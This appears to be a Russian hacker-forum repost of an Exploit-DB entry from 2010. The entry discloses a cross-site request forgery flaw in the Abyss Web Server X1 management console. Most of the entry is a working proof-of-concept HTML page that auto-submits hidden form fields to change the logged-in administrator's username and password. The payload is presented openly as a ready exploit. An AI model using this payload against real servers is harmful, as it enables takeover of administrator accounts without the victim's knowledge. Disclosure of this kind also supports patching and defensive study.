Exploit Abyss Web Server X1 - Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12640
Проверка EDB
  1. Пройдено
Автор
JOHN LEITCH
Тип уязвимости
WEBAPPS
Платформа
WINDOWS
CVE
null
Дата публикации
2010-05-17
Код:
http://osvdb.org/show/osvdb/64693

<http://osvdb.org/show/osvdb/64693>
http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html
 :

Abyss Web Server X1
XSRF<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>
A cross-site request forgery vunlerability in the Abyss Web Server
X1<http://www.aprelium.com/abyssws/download.php> management
console can be exploited to change both the username and password of the
logged in user.
PoC:
 view plain<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
print<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>
?<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>

   1. <html>
   2.     <body onload="document.forms[0].submit()">
   3.         <form method="post" action="
   http://localhost:9999/console/credentials">
   4.             <input type="hidden" name="/console/credentials/login"
   5.                    value="new_username" />
   6.             <input type="hidden" name=
   "/console/credentials/password/$pass1"
   7.                    value="new_password" />
   8.             <input type="hidden" name=
   "/console/credentials/password/$pass2"
   9.                    value="new_password" />
   10.             <input type="hidden" name="/console/credentials/bok"
   11.                    value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />
   12.         </form>
   13.     </body>
   14. </html>

<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>
 
Источник
www.exploit-db.com

Похожие темы